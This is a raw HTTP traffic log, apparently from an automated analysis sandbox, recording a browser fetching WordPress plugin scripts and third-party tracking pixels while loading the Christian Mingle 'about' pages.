__cf_bm=bLz1u9gtv2vpGdD1rOd_U9cYGh08E2Nh0EKo4j6FcPQ-1728225777-1.0.1.1-EoPEgZHaZIfA62t.GVFcw.BuYWxEbkZ9m7e46AYEXTAmJiPHFv.HyVhGngPX1k9OXxx..xzlu18b8E.Qw24yqw
Source: global trafficHTTP traffic detected: GET /beacon.min.js/vcd15cbe7772f49c399c6a5babf22c1241717689176015 HTTP/1.1Host: static.cloudflareinsights.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://about.christianmingle.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://about.christianmingle.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/contact-form-7/includes/swv/js/index.js?ver=5.7.6 HTTP/1.1Host: about.christianmingle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://about.christianmingle.com/en/legal-en/our-commitment-to-accessibility/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=bLz1u9gtv2vpGdD1rOd_U9cYGh08E2Nh0EKo4j6FcPQ-1728225777-1.0.1.1-EoPEgZHaZIfA62t.GVFcw.BuYWxEbkZ9m7e46AYEXTAmJiPHFv.HyVhGngPX1k9OXxx..xzlu18b8E.Qw24yqw
Source: global trafficHTTP traffic detected: GET /wp-content/themes/monstroid2/cherry-framework/modules/cherry-js-core/assets/js/min/cherry-js-core.min.js?ver=1.1.2 HTTP/1.1Host: about.christianmingle.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=bLz1u9gtv2vpGdD1rOd_U9cYGh08E2Nh0EKo4j6FcPQ-1728225777-1.0.1.1-EoPEgZHaZIfA62t.GVFcw.BuYWxEbkZ9m7e46AYEXTAmJiPHFv.HyVhGngPX1k9OXxx..xzlu18b8E.Qw24yqw
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/contact-form-7/includes/js/index.js?ver=5.7.6 HTTP/1.1Host: about.christianmingle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://about.christianmingle.com/en/legal-en/our-commitment-to-accessibility/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=bLz1u9gtv2vpGdD1rOd_U9cYGh08E2Nh0EKo4j6FcPQ-1728225777-1.0.1.1-EoPEgZHaZIfA62t.GVFcw.BuYWxEbkZ9m7e46AYEXTAmJiPHFv.HyVhGngPX1k9OXxx..xzlu18b8E.Qw24yqw
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/03/ChristianMingle_130x57.png HTTP/1.1Host: about.christianmingle.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=bLz1u9gtv2vpGdD1rOd_U9cYGh08E2Nh0EKo4j6FcPQ-1728225777-1.0.1.1-EoPEgZHaZIfA62t.GVFcw.BuYWxEbkZ9m7e46AYEXTAmJiPHFv.HyVhGngPX1k9OXxx..xzlu18b8E.Qw24yqw
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/duracelltomi-google-tag-manager/js/gtm4wp-form-move-tracker.js?ver=1.16.2 HTTP/1.1Host: about.christianmingle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://about.christianmingle.com/en/legal-en/our-commitment-to-accessibility/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=bLz1u9gtv2vpGdD1rOd_U9cYGh08E2Nh0EKo4j6FcPQ-1728225777-1.0.1.1-EoPEgZHaZIfA62t.GVFcw.BuYWxEbkZ9m7e46AYEXTAmJiPHFv.HyVhGngPX1k9OXxx..xzlu18b8E.Qw24yqw
Source: global trafficHTTP traffic detected: GET /beacon.min.js/vcd15cbe7772f49c399c6a5babf22c1241717689176015 HTTP/1.1Host: static.cloudflareinsights.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/themes/monstroid2/cherry-framework/modules/cherry-post-formats-api/assets/js/min/cherry-post-formats.min.js?ver=1.1.0 HTTP/1.1Host: about.christianmingle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://about.christianmingle.com/en/legal-en/our-commitment-to-accessibility/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=bLz1u9gtv2vpGdD1rOd_U9cYGh08E2Nh0EKo4j6FcPQ-1728225777-1.0.1.1-EoPEgZHaZIfA62t.GVFcw.BuYWxEbkZ9m7e46AYEXTAmJiPHFv.HyVhGngPX1k9OXxx..xzlu18b8E.Qw24yqw
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/tm-mega-menu/public/assets/js/script.min.js?ver=1.1.2 HTTP/1.1Host: about.christianmingle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://about.christianmingle.com/en/legal-en/our-commitment-to-accessibility/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=bLz1u9gtv2vpGdD1rOd_U9cYGh08E2Nh0EKo4j6FcPQ-1728225777-1.0.1.1-EoPEgZHaZIfA62t.GVFcw.BuYWxEbkZ9m7e46AYEXTAmJiPHFv.HyVhGngPX1k9OXxx..xzlu18b8E.Qw24yqw
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/power-builder/framework/assets/js/swiper.jquery.min.js?ver=1.3.1 HTTP/1.1Host: about.christianmingle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://about.christianmingle.com/en/legal-en/our-commitment-to-accessibility/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=bLz1u9gtv2vpGdD1rOd_U9cYGh08E2Nh0EKo4j6FcPQ-1728225777-1.0.1.1-EoPEgZHaZIfA62t.GVFcw.BuYWxEbkZ9m7e46AYEXTAmJiPHFv.HyVhGngPX1k9OXxx..xzlu18b8E.Qw24yqw
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/power-builder/framework/assets/js/frontend-builder-global-functions.js?ver=1.3.1 HTTP/1.1Host: about.christianmingle.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=bLz1u9gtv2vpGdD1rOd_U9cYGh08E2Nh0EKo4j6FcPQ-1728225777-1.0.1.1-EoPEgZHaZIfA62t.GVFcw.BuYWxEbkZ9m7e46AYEXTAmJiPHFv.HyVhGngPX1k9OXxx..xzlu18b8E.Qw24yqw
Source: global trafficHTTP traffic detected: GET /wp-content/themes/monstroid2/assets/js/min/swiper.jquery.min.js?ver=3.3.0 HTTP/1.1Host: about.christianmingle.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=bLz1u9gtv2vpGdD1rOd_U9cYGh08E2Nh0EKo4j6FcPQ-1728225777-1.0.1.1-EoPEgZHaZIfA62t.GVFcw.BuYWxEbkZ9m7e46AYEXTAmJiPHFv.HyVhGngPX1k9OXxx..xzlu18b8E.Qw24yqw
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/contact-form-7/includes/js/index.js?ver=5.7.6 HTTP/1.1Host: about.christianmingle.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=bLz1u9gtv2vpGdD1rOd_U9cYGh08E2Nh0EKo4j6FcPQ-1728225777-1.0.1.1-EoPEgZHaZIfA62t.GVFcw.BuYWxEbkZ9m7e46AYEXTAmJiPHFv.HyVhGngPX1k9OXxx..xzlu18b8E.Qw24yqw
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/contact-form-7/includes/swv/js/index.js?ver=5.7.6 HTTP/1.1Host: about.christianmingle.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=bLz1u9gtv2vpGdD1rOd_U9cYGh08E2Nh0EKo4j6FcPQ-1728225777-1.0.1.1-EoPEgZHaZIfA62t.GVFcw.BuYWxEbkZ9m7e46AYEXTAmJiPHFv.HyVhGngPX1k9OXxx..xzlu18b8E.Qw24yqw
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/power-builder/framework/assets/js/libs/jquery.fitvids.js?ver=1.3.1 HTTP/1.1Host: about.christianmingle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://about.christianmingle.com/en/legal-en/our-commitment-to-accessibility/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=bLz1u9gtv2vpGdD1rOd_U9cYGh08E2Nh0EKo4j6FcPQ-1728225777-1.0.1.1-EoPEgZHaZIfA62t.GVFcw.BuYWxEbkZ9m7e46AYEXTAmJiPHFv.HyVhGngPX1k9OXxx..xzlu18b8E.Qw24yqw
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/power-builder/framework/assets/js/libs/waypoints.min.js?ver=1.3.1 HTTP/1.1Host: about.christianmingle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://about.christianmingle.com/en/legal-en/our-commitment-to-accessibility/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=bLz1u9gtv2vpGdD1rOd_U9cYGh08E2Nh0EKo4j6FcPQ-1728225777-1.0.1.1-EoPEgZHaZIfA62t.GVFcw.BuYWxEbkZ9m7e46AYEXTAmJiPHFv.HyVhGngPX1k9OXxx..xzlu18b8E.Qw24yqw
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/duracelltomi-google-tag-manager/js/gtm4wp-form-move-tracker.js?ver=1.16.2 HTTP/1.1Host: about.christianmingle.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=bLz1u9gtv2vpGdD1rOd_U9cYGh08E2Nh0EKo4j6FcPQ-1728225777-1.0.1.1-EoPEgZHaZIfA62t.GVFcw.BuYWxEbkZ9m7e46AYEXTAmJiPHFv.HyVhGngPX1k9OXxx..xzlu18b8E.Qw24yqw
Source: global trafficHTTP traffic detected: GET /wp-content/themes/monstroid2/assets/js/min/jquery.magnific-popup.min.js?ver=1.1.0 HTTP/1.1Host: about.christianmingle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://about.christianmingle.com/en/legal-en/our-commitment-to-accessibility/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=bLz1u9gtv2vpGdD1rOd_U9cYGh08E2Nh0EKo4j6FcPQ-1728225777-1.0.1.1-EoPEgZHaZIfA62t.GVFcw.BuYWxEbkZ9m7e46AYEXTAmJiPHFv.HyVhGngPX1k9OXxx..xzlu18b8E.Qw24yqw
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/power-builder/framework/assets/js/libs/jquery.mobile.custom.min.js?ver=1.3.1 HTTP/1.1Host: about.christianmingle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://about.christianmingle.com/en/legal-en/our-commitment-to-accessibility/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=bLz1u9gtv2vpGdD1rOd_U9cYGh08E2Nh0EKo4j6FcPQ-1728225777-1.0.1.1-EoPEgZHaZIfA62t.GVFcw.BuYWxEbkZ9m7e46AYEXTAmJiPHFv.HyVhGngPX1k9OXxx..xzlu18b8E.Qw24yqw; _gcl_au=1.1.1687367219.1728225781
Source: global trafficHTTP traffic detected: GET /ct/core.js HTTP/1.1Host: s.pinimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://about.christianmingle.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /libtrc/unip/1121901/tfa.js HTTP/1.1Host: cdn.taboola.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://about.christianmingle.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ads/pixel.js HTTP/1.1Host: www.redditstatic.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://about.christianmingle.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/tm-mega-menu/public/assets/js/script.min.js?ver=1.1.2 HTTP/1.1Host: about.christianmingle.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=bLz1u9gtv2vpGdD1rOd_U9cYGh08E2Nh0EKo4j6FcPQ-1728225777-1.0.1.1-EoPEgZHaZIfA62t.GVFcw.BuYWxEbkZ9m7e46AYEXTAmJiPHFv.HyVhGngPX1k9OXxx..xzlu18b8E.Qw24yqw; _gcl_au=1.1.1687367219.1728225781
Source: global trafficHTTP traffic detected: GET /wp-content/themes/monstroid2/cherry-framework/modules/cherry-post-formats-api/assets/js/min/cherry-post-formats.min.js?ver=1.1.0 HTTP/1.1Host: about.christianmingle.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=bLz1u9gtv2vpGdD1rOd_U9cYGh08E2Nh0EKo4j6FcPQ-1728225777-1.0.1.1-EoPEgZHaZIfA62t.GVFcw.BuYWxEbkZ9m7e46AYEXTAmJiPHFv.HyVhGngPX1k9OXxx..xzlu18b8E.Qw24yqw; _gcl_au=1.1.1687367219.1728225781
Source: global trafficHTTP traffic detected: GET /bat.js HTTP/1.1Host: bat.bing.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://about.christianmingle.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/power-builder/framework/assets/js/libs/jquery.closest-descendent.js?ver=1.3.1 HTTP/1.1Host: about.christianmingle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://about.christianmingle.com/en/legal-en/our-commitment-to-accessibility/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=bLz1u9gtv2vpGdD1rOd_U9cYGh08E2Nh0EKo4j6FcPQ-1728225777-1.0.1.1-EoPEgZHaZIfA62t.GVFcw.BuYWxEbkZ9m7e46AYEXTAmJiPHFv.HyVhGngPX1k9OXxx..xzlu18b8E.Qw24yqw; _gcl_au=1.1.1687367219.1728225781
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/power-builder/framework/assets/js/libs/jquery.reverse.js?ver=1.3.1 HTTP/1.1Host: about.christianmingle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://about.christianmingle.com/en/legal-en/our-commitment-to-accessibility/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=bLz1u9gtv2vpGdD1rOd_U9cYGh08E2Nh0EKo4j6FcPQ-1728225777-1.0.1.1-EoPEgZHaZIfA62t.GVFcw.BuYWxEbkZ9m7e46AYEXTAmJiPHFv.HyVhGngPX1k9OXxx..xzlu18b8E.Qw24yqw; _gcl_au=1.1.1687367219.1728225781
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/power-builder/framework/assets/js/libs/waypoints.min.js?ver=1.3.1 HTTP/1.1Host: about.christianmingle.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=bLz1u9gtv2vpGdD1rOd_U9cYGh08E2Nh0EKo4j6FcPQ-1728225777-1.0.1.1-EoPEgZHaZIfA62t.GVFcw.BuYWxEbkZ9m7e46AYEXTAmJiPHFv.HyVhGngPX1k9OXxx..xzlu18b8E.Qw24yqw; _gcl_au=1.1.1687367219.1728225781
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/power-builder/framework/assets/js/swiper.jquery.min.js?ver=1.3.1 HTTP/1.1Host: about.christianmingle.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=bLz1u9gtv2vpGdD1rOd_U9cYGh08E2Nh0EKo4j6FcPQ-1728225777-1.0.1.1-EoPEgZHaZIfA62t.GVFcw.BuYWxEbkZ9m7e46AYEXTAmJiPHFv.HyVhGngPX1k9OXxx..xzlu18b8E.Qw24yqw; _gcl_au=1.1.1687367219.1728225781
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/power-builder/framework/assets/js/libs/jquery.fitvids.js?ver=1.3.1 HTTP/1.1Host: about.christianmingle.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=bLz1u9gtv2vpGdD1rOd_U9cYGh08E2Nh0EKo4j6FcPQ-1728225777-1.0.1.1-EoPEgZHaZIfA62t.GVFcw.BuYWxEbkZ9m7e46AYEXTAmJiPHFv.HyVhGngPX1k9OXxx..xzlu18b8E.Qw24yqw; _gcl_au=1.1.1687367219.1728225781
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/power-builder/framework/assets/js/jquery.tm-pb-simple-carousel.js?ver=1.3.1 HTTP/1.1Host: about.christianmingle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://about.christianmingle.com/en/legal-en/our-commitment-to-accessibility/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=bLz1u9gtv2vpGdD1rOd_U9cYGh08E2Nh0EKo4j6FcPQ-1728225777-1.0.1.1-EoPEgZHaZIfA62t.GVFcw.BuYWxEbkZ9m7e46AYEXTAmJiPHFv.HyVhGngPX1k9OXxx..xzlu18b8E.Qw24yqw; _gcl_au=1.1.1687367219.1728225781
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/power-builder/framework/assets/js/jquery.tm-pb-simple-slider.js?ver=1.3.1 HTTP/1.1Host: about.christianmingle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://about.christianmingle.com/en/legal-en/our-commitment-to-accessibility/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=bLz1u9gtv2vpGdD1rOd_U9cYGh08E2Nh0EKo4j6FcPQ-1728225777-1.0.1.1-EoPEgZHaZIfA62t.GVFcw.BuYWxEbkZ9m7e46AYEXTAmJiPHFv.HyVhGngPX1k9OXxx..xzlu18b8E.Qw24yqw; _gcl_au=1.1.1687367219.1728225781
Source: global trafficHTTP traffic detected: GET /ct/core.js HTTP/1.1Host: s.pinimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
